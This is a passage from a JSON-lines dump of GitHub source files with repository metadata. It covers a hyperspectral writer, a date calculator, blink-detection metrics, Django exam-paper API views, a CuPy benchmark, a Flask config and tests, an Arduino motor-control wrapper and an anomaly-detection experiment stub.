hyperspec_metadata_file = os.path.join(region_dir, f\"{sample_id}_global.json\")\n print(region_dir)\n print(happy_data.global_dict)\n with open(hyperspec_metadata_file, 'w') as f:\n json.dump(happy_data.global_dict, f)\n\n # Write other metadata\n for target_name, target_data in happy_data.metadata_dict.items():\n print(f\"target: {target_name}\")\n metadata_file_path = os.path.join(region_dir, f\"{target_name}.hdr\")\n envi_writer.write_data(target_data['data'], metadata_file_path, datatype=self.get_datatype_mapping_for(datatype_mapping, target_name))\n\n # Write mapping if available\n mapping = target_data.get('mapping')\n if mapping:\n mapping_json_file = os.path.join(region_dir, f\"{target_name}.json\")\n with open(mapping_json_file, 'w') as f:\n json.dump(mapping, f)\n","repo_name":"wairas/happy-hsi-to-csv","sub_path":"src/happy/writers/_happy_writer.py","file_name":"_happy_writer.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13122946232","text":"def askDate():\n print(\"entrez une date supérieur à l'an 1583 et inférieur à l'an 9999 au format DD/MM/YYYY\")\n year=0\n while year<1583 or year>9999: #la boucle se répète si les condition sur l'année ne sont pas respéctés.\n entry = input(\"date : \")\n year = int(entry[6:10]) #on récupère le substring contenant l'année\n if year<1583 or year>9999 :\n print(\"entrez une date supérieur à l'an 1583 et inférieur à l'an 9999 au format DD/MM/YYYY\") #en cas de non respect des consignes on les re-affiche\n return int(entry[0:2]),int(entry[3:5]),int(entry[6:10]) #finalement en sortant de la boucle on retourne les données\n\ndef magicCalculation(day,month,year): #permet de calculer le jour\n c = (14-month)//12\n a = year-c\n m = month +12*c -2\n j = (day + a + a//4 -a//100 + a//400 +(31*m)//12)%7 #les formules sont donnés en consigne\n\n return(j)\n\ndef DayAssignement (nb) :\n jours = {0:\"dimanche\",1:\"lundi\",2:\"mardi\",3:\"mercredi\",4:\"jeudi\",5:\"vendredi\",6:\"samedi\"} #on crée un dictionaire qui retournera le bon str en fonction du jour\n return jours[nb]\n \n\nj,m,y = askDate() #on assigne le jour à j, le mois à m et l'année à y\n\nd = magicCalculation(j,m,y) #on calcule le jour de la semaine\n\nprint(DayAssignement(d)) #on affiche le str correspondant au jour","repo_name":"HenriqueMARTINS9/ESIEE-3A","sub_path":"Python/TP1/DM/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5537668184","text":"'''Detect if eyes or mouth are closed for blink detection'''\nimport math\nimport numpy as np\n\ndef eye_aspect_ratio(eye: np.array) -> float:\n '''Calculates the eye width to height ratio to indicate whether an eye is closed or not\n\n Args\n ----\n eye (np.array of floats): The facial landmark coordinates corresponding to the left or right eye\n\n Returns\n -------\n EAR (float): The computed eye aspect ratio\n '''\n\n try:\n # EAR = (|p1-p5|+|p2-p4|) / 2*|p0-p3|\n A = abs(math.dist(eye[1], eye[5]))\n B = abs(math.dist(eye[2], eye[4]))\n C = abs(math.dist(eye[0], eye[3]))\n EAR = (A + B) / (2.0 * C)\n except ZeroDivisionError:\n EAR = None\n\n return EAR\n\ndef mouth_aspect_ratio(mouth: np.array) -> float:\n '''Calculates the mouth width to height ratio to indicate whether the mouth is closed or not\n\n Args\n ----\n mouth (np.array of floats): The facial landmark coordinates corresponding to the mouth\n\n Returns\n -------\n MAR (float): The computed mouth aspect ratio\n '''\n \n try:\n # MAR = (|p2-p8|+|p3-p7|+|p4-p6|) / 2*|p1-p5|\n A = abs(math.dist(mouth[13], mouth[19]))\n B = abs(math.dist(mouth[14], mouth[18]))\n C = abs(math.dist(mouth[15], mouth[17]))\n D = abs(math.dist(mouth[12], mouth[16]))\n MAR = (A + B + C) / (2.0 * D)\n except ZeroDivisionError:\n MAR = None\n\n return MAR","repo_name":"Nielsencu/ripplecreate-attention-model","sub_path":"src/landmark_metrics.py","file_name":"landmark_metrics.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31020064996","text":"from urllib import response\nfrom django.shortcuts import get_object_or_404\nfrom django.views.generic import View\nfrom django.db import transaction\nfrom django.contrib.auth import get_user_model\nfrom django.db.models import Q, Sum\nfrom django.contrib.postgres.aggregates import ArrayAgg\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.generics import CreateAPIView\n\nfrom .models import CheckingTestPaper, Question, Answer, TestPaper, Profile, Subject\nfrom .serializers import (SubjectSerializer, ProfileSerializer, QuestionSerializer,\nQuestionDetailSerializer)\n\nUser = get_user_model()\n\nclass UserCreation(APIView):\n \n def post(self, request, *args, **kwargs):\n params = request.data\n if 'username' in params:\n username = params['username']\n else:\n return Response({\"message\": \"User Name is required Value\"},\n status=status.HTTP_400_BAD_REQUEST)\n if 'first_name' not in params or 'last_name' not in params:\n return Response({\"message\": \"first and last names are required Values\"},\n status=status.HTTP_400_BAD_REQUEST)\n first_name = params['first_name']\n last_name = params['last_name']\n if 'contact' not in params:\n return Response({\"message\": \"Contact number is required field\"},\n status=status.HTTP_400_BAD_REQUEST)\n contact = params['contact']\n if 'email' not in params:\n return Response({\"message\": \"email is required field\"},\n status=status.HTTP_400_BAD_REQUEST)\n if 'subject' not in params:\n return Response({\"message\": \"subject is required field\"},\n status=status.HTTP_400_BAD_REQUEST)\n if 'profile_choice' not in params:\n return Response({\"message\": \"profile_choice is required field\"},\n status=status.HTTP_400_BAD_REQUEST)\n email = params['email']\n lookup = Q(user__email=email) | Q(mobile_number=contact)\n if Profile.objects.filter(lookup).exists():\n return Response({\"message\": \"Contact or Email already exists\"},\n status=status.HTTP_400_BAD_REQUEST)\n transaction.set_autocommit(autocommit=False)\n user_obj = User.objects.create(\n username=username,\n email=email,\n first_name=first_name,\n last_name=last_name,\n )\n user_obj.set_password(params['password'])\n user_obj.save()\n profile = Profile.objects.create(\n user=user_obj,\n subject_id=params['subject'],\n profile_choice=params['profile_choice'],\n mobile_number=contact\n )\n\n data = ProfileSerializer(profile, many=False).data\n transaction.commit()\n return Response({\"result\": data}, status=status.HTTP_201_CREATED)\n\nclass UserDetails(APIView):\n\n def get(self, request, *args, **kwargs):\n pk = request.query_params.get('profile_id')\n profile_obj = get_object_or_404(Profile, id=pk)\n data = ProfileSerializer(profile_obj, many=False).data\n return Response({\"result\": data}, status=status.HTTP_200_OK)\n\n\nclass SubjectsList(APIView):\n \n def get(self, request, *args, **kwargs):\n subjects = Subject.objects.filter(is_active=True,\n is_delete=False)\n serializer = SubjectSerializer(subjects, many=True).data\n print(serializer)\n return Response({\"result\":serializer}, status=status.HTTP_200_OK)\n\n\nclass QuestionApiView(APIView):\n model = Question\n queryset = Question.objects.filter(is_active=True,\n is_delete=False)\n\n def get(self, request, *args, **kwargs):\n params = request.query_params\n dilo = {}\n if 'subject' in params:\n dilo['subject_id'] = params['subject']\n if 'user' in params:\n dilo['creater_id'] = params['user']\n if 'search' in params:\n dilo['question__icontains'] = params['search']\n if 'question_id' in params:\n question_objs = self.queryset.filter(id=params['question_id'])\n else:\n question_objs = self.queryset.filter(**dilo)\n data = QuestionSerializer(question_objs, many=True).data\n return Response(\n {\"result\": data,}, status=status.HTTP_200_OK\n )\n\n def post(self, request, *args, **kwargs):\n data = request.data\n if 'question' not in data or 'q_marks' not in data:\n return Response({'messgae': \"Required Fields are not there\",},\n status=status.HTTP_400_BAD_REQUEST)\n question = data['question']\n marks = data['q_marks']\n # TODO ned to update after authorization\n user = User.objects.filter(profile__profile_choice=0).last()\n subject = user.profile_set.first().subject\n if 'answer' not in data:\n return Response({\"message\": \"Answer deails should provide\"},\n status=status.HTTP_400_BAD_REQUEST)\n answer = data['answer']\n transaction.set_autocommit(autocommit=False)\n if Question.objects.filter(question=question).exists():\n return Response({\"message\": \"Question With same details aleady exists, plese search with question\"},\n status=status.HTTP_400_BAD_REQUEST)\n que_obj = Question.objects.create(\n question=question,\n creater_id=user.id,\n subject_id=subject.id,\n question_marks=marks\n )\n answer_obj = Answer.objects.create(\n question_id=que_obj.id,\n answer=answer,\n answer_type='TEXT'\n )\n seriliazer = QuestionDetailSerializer(answer_obj, many=False)\n transaction.commit()\n return Response({\"result\": seriliazer.data},\n status=status.HTTP_201_CREATED)\n\n\nclass TestPaperCreationView(CreateAPIView):\n model = TestPaper\n\n def post(self, request, *args, **kwargs):\n data = request.data\n if \"questions\" not in data:\n return Response({\"message\": \"Need Questions\"}, status=status.HTTP_400_BAD_REQUEST)\n questions = data['questions'].split(\",\")\n number_of_questions = len(questions)\n que_objs = Question.objects.filter(\n id__in=questions)\n total_marks = que_objs.aggregate(\n total_marks=Sum('question_marks'))['total_marks']\n if 'cut_off_marks' not in data:\n return Response({\"message\": \"Need to mention Cut Off Marks\"}, status=status.HTTP_400_BAD_REQUEST)\n cutoffmarks = int(data['cut_off_marks'])\n if cutoffmarks > total_marks:\n return Response({\"message\": \"Cut Off Marks Are greater than Total marks\"}, status=status.HTTP_400_BAD_REQUEST)\n # TODO ned to update after authorization\n user = User.objects.filter(profile__profile_choice=0).last()\n subject = user.profile_set.first().subject\n test_paper_obj = self.model.objects.create(\n total_marks=total_marks,\n cut_off_marks=cutoffmarks,\n setter_id=user.id,\n subject_id=subject.id,\n number_of_questions=number_of_questions\n )\n test_paper_obj.questions.add(*questions)\n test_paper_obj.save()\n return Response({\"message\": \"Test Paper is created\"}, status=status.HTTP_201_CREATED)\n\nclass TestPaperListView(APIView):\n model = TestPaper\n queryset = TestPaper.objects.filter(is_active=True,\n is_delete=False)\n \n def get(self, request, *args, **kwargs):\n # TODO ned to update after authorization\n user = User.objects.filter(profile__profile_choice=0).first()\n test_papers = TestPaper.objects.filter(\n # setter_id=user.id,\n is_active=True,\n is_delete=False,\n ).annotate(question=ArrayAgg('questions__question'),\n answers=ArrayAgg('questions__answer__answer')\n ).values('question', 'answers', 'total_marks', 'cut_off_marks',\n 'subject__subject_name', 'is_checker_approved', 'is_examinar_approved',\n 'checker_review', 'examiner_review'\n )\n return Response({\"result\": test_papers}, status=status.HTTP_200_OK)\n\nclass TestPaperSetterSubmission(APIView):\n model = TestPaper\n queryset = TestPaper.objects.filter(is_active=True,\n is_delete=False)\n\n def get(self, request, *args, **kwargs):\n # TODO ned to update after authorization\n user = User.objects.filter(profile__profile_choice=0).first()\n test_papers = TestPaper.objects.filter(\n setter_id=user.id,\n is_active=True,\n is_delete=False,\n is_sent_for_cheeck=False\n ).annotate(question=ArrayAgg('questions__question'),\n answers=ArrayAgg('questions__answer__answer')\n ).values('question', 'answers', 'total_marks', 'cut_off_marks',\n 'subject__subject_name', 'is_checker_approved', 'is_examinar_approved',\n 'checker_review', 'examiner_review'\n )\n return Response({\"result\": test_papers}, status=status.HTTP_200_OK)\n\n def post(self, request):\n data = request.data\n if \"testpaper_id\" not in data:\n return Response({\"message\": \"Test Paper is Required\"}, status=status.HTTP_400_BAD_REQUEST)\n testpepr_obj = get_object_or_404(TestPaper, id=data['testpaper_id'])\n testpepr_obj.is_sent_for_cheeck = True\n testpepr_obj.save()\n return Response({\"message\": \"Sent For checking\"}, status=status.HTTP_200_OK)\n\nclass TestPaperCheckerAcception(APIView):\n model = TestPaper\n \n def get(self, request):\n qp_id = request.query_params.get('testpaper_id')\n testpaper = self.model.objects.get(id=qp_id)\n # TODO ned to update after authorization\n user = User.objects.filter(profile__profile_choice=1).first()\n testpaper.checker = user\n testpaper.save()\n response = {\n \"message\": \"Accepted For checking\",\n \"id\": qp_id,\n \"Number of Questions\": testpaper.number_of_questions,\n \"questions\": testpaper.questions.values_list('question', flat=True),\n \"Total Marks\": testpaper.total_marks,\n \"Cut Off Marks\": testpaper.cut_off_marks\n }\n return Response(response, status=status.HTTP_200_OK)\n \n def post(self, request):\n import json\n data = request.data\n if \"testpaper_id\" not in data:\n return Response({\"message\": \"Test Paper is Required\"}, status=status.HTTP_400_BAD_REQUEST)\n testpaper_obj = get_object_or_404(TestPaper, id=data['testpaper_id'])\n if \"approval\" not in data:\n return Response({\"message\": \"Approval is Required\"}, status=status.HTTP_400_BAD_REQUEST)\n checker_message = data.get('messgae')\n approval = data['approval'] == \"True\"\n testpaper_obj.is_checker_approved = approval\n check_paper_obj, is_created = CheckingTestPaper.objects.get_or_create(test_paper_id=testpaper_obj.id)\n testpaper_obj.checker_review = checker_message\n check_paper_obj.checker_review = checker_message\n check_paper_obj.is_checker_approved = approval\n check_paper_obj.save()\n response = {\n 'message': 'paper is approved By Checker Sent to Examiner'\n }\n if not approval:\n testpaper_obj.checker = None\n testpaper_obj.is_sent_for_cheeck = False\n response['message'] = \"Paper is Not approved please check\"\n testpaper_obj.save()\n return Response(response, status=status.HTTP_200_OK)\n\n\n","repo_name":"KarunakarKodaru/Exam-Backend","sub_path":"papers_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7509707096","text":"import numpy as np \nimport cupy as cp \nimport time \n\nx_gpu = cp.array([1,0,1,1]) #declaring a cupy array\nnorm = cp.linalg.norm(x_gpu) #test inbuilt function that works on gpu\n#print(norm)\n\n# cp.cuda.Device(n).use() for swapping gpu on multi gpu systems\n\n\"\"\"\nOperations are performed on current device\ntherefore once gpu switched operations on variable\ndeclared with previous device must not be run.\n\"\"\"\n\nx = np.array([1,2,3])\nx2_gpu = cp.asarray(x) # this function can be used to pass np arrays to cp arrays\nx3 = cp.asnumpy(x2_gpu) # this function can be used to pass cp arrays to numpy arrays\n\n\"\"\"\nFor cpu/gpu agnostic code this can be used:\n\"\"\"\n\n#xp = cp.get_array_module(x)\nN = 1000\nN2 = 1000000\ny = np.random.uniform(0,1,N2)\ny_gpu = cp.asarray(y)\n\nprint(\"test between numpy and cupy\")\nprint(\"numpy test\")\nt0 = time.clock()\nfor i in range(N):\n np.linalg.norm(y)\nt1 = time.clock() - t0\nprint(t1)\nprint(\"cupy test\")\nt0 = time.clock()\nfor i in range(N):\n cp.linalg.norm(y_gpu)\nt1 = time.clock() - t0\nprint(t1)\n\n\"\"\"\non HP laptop with Intel i7-7700HQ processor with\nNVidia GTX 1050 6GB VRAM with 8GB RAM,\nN = 1000, N2 = 1000000\nthe following results were obtained:\n\ntest between numpy and cupy\nnumpy test\n7.684543\ncupy test\n1.631170000000001\n\"\"\"","repo_name":"srike27/cupycopypasta","sub_path":"cupy01.py","file_name":"cupy01.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18682635725","text":"\n\nfrom nose.tools import *\nimport os\nimport shutil\nfrom mgf_checker.checker import Checker\n\n\nclass TestChecker(object):\n _multiprocess_shared_ = True\n\n def test_parsemzid(self):\n c = Checker(\"tests/data/F082488.mzid\")\n c.parse_mz_id()\n assert_equal(c.identifications[0][1].ion_series_ary[0].fragtype, \"frag: b ion\")\n assert_equal(c.identifications[0][1].ion_series_ary[0].charge, 1)\n assert_equal(c.identifications[0][1].ion_series_ary[0].mz_ary, 129.10202)\n \"\"\"\n \n \n \n \n \n \n \"\"\"\n\n def test_readmgf(self):\n c = Checker(\"tests/data/F082488.mzid\")\n c.read_enhanced_spectrum(\"/home/tobiass/goto/master/data/HeLa/2_nd_measurenment/01533_B12_P015940_B00_A00_R3_20_improved.mgf\")\n assert_equal(c.mgf_reads['39'].mz_ary[0], 136.06149289999999)\n\n ms = c.mgf_reads['39'].request_ms()\n\n assert_equal(len(ms.spectrum[0][351]), 1)\n\n def test_compare_mzid_mgf(self):\n # c = Checker(\"/home/tobiass/Desktop/F083063.mzid\")\n # c.parse_mz_id()\n # c.read_enhanced_spectrum(\"/home/tobiass/goto/master/data/HeLa/2_nd_measurenment/01533_B12_P015940_B00_A00_R3_20_improved.mgf\")\n # c.analyse_mzid_vs_mgf()\n # assert_equal(1, 2)\n pass\n\n def test_get_peptide_info(self):\n c = Checker(\"tests/data/F082488.mzid\")\n c.parse_mz_id_peptide_ref()\n assert_equal(c.peptide_evidence['peptide_6190_1'].peptide_sequence, 'CCTESLVNRRPCFSALTPDETYVPK')\n assert_equal(c.peptide_evidence['peptide_6190_1'].modification[0].name, 'TMT6plex')\n assert_equal(c.peptide_evidence['peptide_6190_1'].modification[25].name, 'TMT6plex')\n assert_equal(c.peptide_evidence['peptide_6190_1'].modification[2].name, 'Carbamidomethyl')\n\n def test_info_about_peptide_tag_amount(self):\n \"\"\"\n peptide_6180_1 has two TMT and is therefore more interesting\n sequence is 23 amino acid long\n \"\"\"\n c = Checker(\"tests/data/F082488.mzid\")\n c.parse_mz_id()\n c.parse_mz_id_peptide_ref()\n assert_equal(c.peptide_evidence['peptide_6180_1'].peptide_sequence, 'CCTKPESERMPCTEDYLSLILNR')\n b_tmt, y_tmt = c.peptide_evidence['peptide_6180_1'].get_annotated_positions()\n assert_equal(b_tmt[4], 2)\n assert_equal(b_tmt[3], 1)\n assert_equal(b_tmt[1], 1)\n assert_equal(b_tmt[23], 2)\n assert_equal(y_tmt[23], 2)\n assert_equal(y_tmt[21], 1)\n assert_equal(y_tmt[20], 1)\n assert_equal(y_tmt[19], 0)\n assert_equal(y_tmt[3], 0)\n\n def test_read_score_file(self):\n c = Checker(\"tests/data/F082488.mzid\")\n allowed_ids = [8358]\n spectra = c.read_score_file(\"/home/tobiass/goto/master/data/HeLa/2_nd_measurenment/01533_B12_P015940_B00_A00_R3_20_improved.csv\", allowed_ids)\n assert_equal(8358 in spectra, True)\n assert_equal(len(spectra[8358]), 2)\n assert_equal(len(spectra[8358]['mz']), 129)\n\n def test_compare_mz_id_score_file(self):\n # c = Checker(\"/home/tobiass/Desktop/F083270.mzid\")\n # c.parse_mz_id()\n # c.analyze_mzid_id_vs_score_file(path_score=\"/home/tobiass/goto/master/data/HeLa/2_nd_measurenment/01533_B12_P015940_B00_A00_R3_20_improved.csv\",\n # output_path=\"/home/tobiass/Desktop/out.csv\")\n assert_equal(1, 1)\n\n @classmethod\n def teardown_class(cls):\n shutil.rmtree(\"tests/data/temp\")\n\n @classmethod\n def setup_class(cls):\n if not os.path.exists(\"tests/data/temp\"):\n os.makedirs(\"tests/data/temp\")\n","repo_name":"kusterlab/MasterSpectrum","sub_path":"tests/checker_tests.py","file_name":"checker_tests.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"21881416763","text":"import os\nfrom pathlib import Path\n\nfrom dotenv import load_dotenv\n\nenv = Path(\"..\") / \".env\"\nload_dotenv(dotenv_path=env)\n\nfrom app.utils import randomString, randomKey\n\n\ndef loadConfig(config, app):\n configs = {\n \"development\": DevConfig,\n \"production\": ProdConfig,\n }\n\n app.config.from_object(configs[config])\n\n\nclass Config:\n NAME = os.getenv(\"NAME\", \"Flask App\")\n SERVER_NAME = os.getenv(\"SERVER_NAME\", \"\")\n ROOT_KEY = os.getenv(\"ROOT_KEY\", randomKey(12))\n SECRET_KEY = os.getenv(\"SECRET_KEY\", randomString(25))\n\n CSP = {\n \"default-src\": [\n \"'self'\",\n \"'unsafe-inline'\",\n \"fonts.googleapis.com\",\n \"fonts.gstatic.com\",\n ],\n \"img-src\": [\"*\", \"data:\", \"blob:\"],\n \"script-src\": [\"'self'\", \"'unsafe-inline'\", \"'unsafe-eval'\"],\n \"frame-src\": [\"docs.google.com\", \"www.google.com\", \"www.youtube.com\"],\n \"worker-src\": [],\n \"child-src\": [],\n \"connect-src\": [],\n }\n\n COMPRESS_MIMETYPES = [\n \"text/html\",\n \"text/css\",\n \"text/xml\",\n \"application/json\",\n \"application/javascript\",\n ]\n COMPRESS_LEVEL = 6\n COMPRESS_MIN_SIZE = 500\n SEND_FILE_MAX_AGE_DEFAULT = 31536000\n\n MAX_CONTENT_LENGTH = 50 * 1024 * 1024\n UPLOAD_FOLDER = \"app/uploads\"\n UPLOAD_EXTENSIONS = {\n \"bmp\",\n \"gif\",\n \"jpg\",\n \"jpeg\",\n \"png\",\n \"webp\",\n \"avi\",\n \"mov\",\n \"mp4\",\n \"webm\",\n }\n\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n\n\nclass DevConfig(Config):\n ENVIRONMENT = \"development\"\n SQLALCHEMY_DATABASE_URI = f\"sqlite:///{ os.getenv('DEV_DB_FILE', '')}\"\n\n\nclass ProdConfig(Config):\n ENVIRONMENT = \"production\"\n\n user = os.getenv(\"DB_USER\")\n password = os.getenv(\"DB_PASS\")\n server = os.getenv(\"DB_HOST\", \"127.0.0.1\")\n database = os.getenv(\"DB_NAME\")\n\n SQLALCHEMY_DATABASE_URI = f\"mysql://{ user }:{ password }@{ server }/{ database }?ssl=true&charset=utf8mb4\"\n","repo_name":"CabotScouts/virtual-camp","sub_path":"site/app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71467066473","text":"\"\"\"\nDescription: Package for servo motor controls. Python wrapper for Arduino serial commands \nto talk to the motor. Contains a single 'MotorControl' class.\n\nUsage: Only for Alice and Bob. Slight modifications will need to be made to talk to Eve's motors.\n\nAuthors: Qcumber 2018, Xi Jie\n\nVersion: 1.0\n\"\"\"\nfrom turtle import write_docstringdict\nimport serial\nimport time\n\nclass MotorControl(object):\n# Module for communicating with the arduino analog pin\n\n\tdef __init__(self, port):\n\t\tself.baudrate = 38400 # Arduino baudrate\n\t\tself.serial = serial.Serial(port = port, baudrate = self.baudrate, timeout=3)\n\t\tstuck_flag = True\n\t\twhile stuck_flag:\n\t\t\tself.serial.write('ANG? '.encode())\n\t\t\tif not self.serial.in_waiting:\n\t\t\t\t# print(\"Stuck... Retrying\")\n\t\t\t\tif not self.serial.isOpen():\n\t\t\t\t\tself.serial = serial.Serial(port, timeout=3)\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\ttime.sleep(1)\n\t\t\t\tself.serial.reset_input_buffer()\n\t\t\t\tprint(\"Program Launched Successfully\")\n\t\t\t\tstuck_flag = not stuck_flag\n\n\tdef close_port(self):\n\t\tif self.serial.is_open:\n\t\t\tself.serial.close()\n\n\tdef get_voltage(self):\n\t\tself.serial.write('VOLT? '.encode())\n\t\tvoltage_bit = float(self.readline_fix()) # Remove /n, change str to float\n\t\tvoltage = voltage_bit/1024*5 # Convert from bit range to voltage (0-1023 --> 0-5V)\n\t\treturn voltage\n\n\tdef set_angle(self,angle):\n\t\t#Sets the absolute angle of the motor stepper\n\t\tcurr_offset = self.get_offset()\n\t\twriteStr = 'SETANG ' + str(angle) + ' '\n\t\tself.serial.write(writeStr.encode())\n\t\tself.readline_fix()\n\n\tdef get_angle(self):\n\t\t#Gets the absolute angle of the motor stepper\n\t\tself.serial.write('ANG? '.encode())\n\t\tangle = self.readline_fix()\n\t\treturn angle\n\n\tdef set_offset(self,angle):\n\t\t#Sets the offset angle of the motor stepper at H polarisation\n\t\twriteStr = 'SETHOF ' + str(angle) + ' '\n\t\tself.serial.write(writeStr.encode())\n\t\tself.readline_fix()\n\n\tdef get_offset(self):\n\t\t#Gets the offset angle of the motor stepper at H polarisation\n\t\tself.serial.write('HOF? '.encode())\n\t\tangle = self.readline_fix()\n\t\treturn angle\n\n\tdef set_pol(self, pol):\n\t\t# Sets the polarization to 0,1,2,3 - H,D,V,A\n\t\twriteStr = 'SETPOL ' + str(pol) + ' '\n\t\tself.serial.write(writeStr.encode())\n\t\tself.readline_fix()\n\n\tdef get_pol(self):\n\t\t# Gets the polarization 0,1,2,3 - H,D,V,A\n\t\tself.serial.write('POL? '.encode())\n\t\tpol = self.readline_fix()\n\t\treturn pol\n\n\tdef set_threshold(self,threshold):\n\t\t#Sets the detector threshold from 0-1023. 200 is approx. 1V\n\t\twriteStr = 'SETTH ' + str(threshold) + ' '\n\t\tself.serial.write(writeStr.encode())\n\t\tself.readline_fix()\n\n\tdef get_threshold(self):\n\t\t#Gets the detector threshold from 0-1023. 200 is approx. 1V\n\t\tself.serial.write('TH? '.encode())\n\t\tthreshold = self.readline_fix()\n\t\treturn threshold\n\n\tdef power_on(self):\n\t\t#Powers on laser\n\t\tself.serial.write(\"LASON \".encode())\n\t\tself.readline_fix()\n\n\tdef readline_fix(self):\n\t\twhile True:\n\t\t\tif self.serial.in_waiting:\n\t\t\t\treturn self.serial.readline()[:-2].decode()\n\n\tdef power_off(self):\n\t\t#Powers off laser\n\t\tself.serial.write(\"LASOFF \".encode())\n\t\tself.readline_fix()","repo_name":"s-fifteen-instruments/Quantum_Cryptography_Educational_Kit_EKPQC","sub_path":"programs/2_QuantumKey/AlignmentGUI/motorControls.py","file_name":"motorControls.py","file_ext":"py","file_size_in_byte":3063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25667355050","text":"import unittest\n\nfrom flask import json\n\nfrom app import create_app, db\nfrom app.models import Stock, User, Watchlist\nfrom test.sample_requests import *\n\n\nclass RemoveFromWatchlistTestCase(unittest.TestCase):\n \"\"\"This class represents removing stock from watchlist test case\"\"\"\n\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app(config_name=\"testing\")\n self.client = self.app.test_client\n\n # binds the app to the current context\n with self.app.app_context():\n # create all tables\n db.create_all()\n\n # Insert testing data\n Stock(test_stock_1_ticker, test_stock_1_date, close=test_stock_1_close).save()\n User(test_user_id, test_user_name).save()\n Watchlist(test_add_stock, test_user_id).save()\n\n def test_denied(self):\n \"\"\"Test if the remove from watchlist dialog without confirmation works.\n Flow, there is a stock in users watchlist, user asks to remove it but\n denies it afterwards.\"\"\"\n\n # Setup: check if there is stock in users watchlist\n with self.app.app_context():\n watchlist = Watchlist.get_users_tickers(test_user_id)\n self.assertIn(test_add_stock, watchlist)\n\n # Step 1 ask to remove stock (stock present)\n res = self._remove_from_watchlist(test_add_stock)\n # Assert\n self.assertEqual(res.status_code, 200)\n self.assertIn(RESPONSE_intent_remove_from_watchlist_ask_confirmation,\n str(res.data))\n\n # Step 2 deny removing the stock\n # Prepare request\n request = json.dumps(intent_remove_from_watchlist_deny())\n\n # Execute\n res = self.client().post('/api/', data=request,\n content_type='application/json')\n\n # Assert\n self.assertEqual(res.status_code, 200)\n self.assertIn(RESPONSE_intent_remove_from_watchlist_denied,\n str(res.data))\n # Check if stock is still in watchlist\n with self.app.app_context():\n watchlist = Watchlist.get_users_tickers(test_user_id)\n self.assertIn(test_add_stock, watchlist)\n\n def test_confirmed(self):\n \"\"\"Test if the remove from watchlist dialog confirmed works.\n Flow, there is a stock in users watchlist, user asks to remove it but\n denies it afterwards.\"\"\"\n # Setup: check if there is stock in users watchlist\n with self.app.app_context():\n watchlist = Watchlist.get_users_tickers(test_user_id)\n self.assertIn(test_add_stock, watchlist)\n\n # Step 1 ask to remove stock (stock present)\n res = self._remove_from_watchlist(test_add_stock)\n # Assert\n self.assertEqual(res.status_code, 200)\n self.assertIn(RESPONSE_intent_remove_from_watchlist_ask_confirmation,\n str(res.data))\n\n # Step 2 Confirm removing the stock\n # Prepare request\n request = json.dumps(intent_remove_from_watchlist_confirm())\n\n # Execute\n res = self.client().post('/api/', data=request,\n content_type='application/json')\n\n # Assert\n self.assertEqual(res.status_code, 200)\n self.assertIn(RESPONSE_intent_remove_from_watchlist_confirmed\n .format(test_add_stock),\n str(res.data))\n # Check if stock was removed from watchlist\n with self.app.app_context():\n watchlist = Watchlist.get_users_tickers(test_user_id)\n self.assertNotIn(test_add_stock, watchlist)\n\n def test_watchlist_empty(self):\n \"\"\"Test removing stock from watchlist when watchlist is empty.\"\"\"\n\n # Setup: check the target stock is not in users watchlist\n with self.app.app_context():\n watchlist = Watchlist.get_users_tickers(test_user_id)\n self.assertNotIn(test_stock_1_ticker, watchlist)\n\n # Step 1 ask to remove stock (stock not present)\n res = self._remove_from_watchlist(test_stock_1_ticker)\n # Assert\n self.assertEqual(res.status_code, 200)\n self.assertIn(RESPONSE_intent_remove_from_watchlist_not_there,\n str(res.data))\n pass\n\n def _remove_from_watchlist(self, ticker):\n \"\"\"Test removing stock from watchlist, no assertion.\n :return: response to the request\"\"\"\n # Prepare request\n request = json.dumps(intent_remove_from_watchlist(ticker))\n\n # Execute\n res = self.client().post('/api/', data=request,\n content_type='application/json')\n return res\n\n def tearDown(self):\n \"\"\"teardown all initialized variables.\"\"\"\n with self.app.app_context():\n # drop all tables\n db.session.remove()\n db.drop_all()\n\n\n# Make the tests conveniently executable\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"drabekj/OttoBot-Alexa-Skill","sub_path":"test/test_remove_from_watchlist.py","file_name":"test_remove_from_watchlist.py","file_ext":"py","file_size_in_byte":4966,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40558468841","text":"from model.ae_flow_model import AE_Flow_Model\nfrom model.Auto_encoder_seperate import AE_Model\nfrom anomalib.models.fastflow.torch_model import FastflowModel\nfrom dataloader import load, split_data, fold_to_loaders\nimport torch.utils.data as data\nimport torch\n\n# We use this object to keep track of experiment/run relevant information, \n# especially to deal with \nclass Experiment():\n \n def __init__(self, args, verbose=True):\n\n super().__init__()\n self.dataset = args.dataset\n self.args = args\n\n if self.dataset == 'btech':\n self.subsets = ['01', '02', '03']\n self.anomalib_dataset = True\n elif self.dataset == 'mvtec':\n self.subsets = ['pill', 'toothbrush', 'wood', 'grid', 'capsule', 'transistor', 'screw', 'carpet', 'cable', 'bottle', 'tile', 'metal_nut', 'hazelnut', 'leather', 'zipper']\n 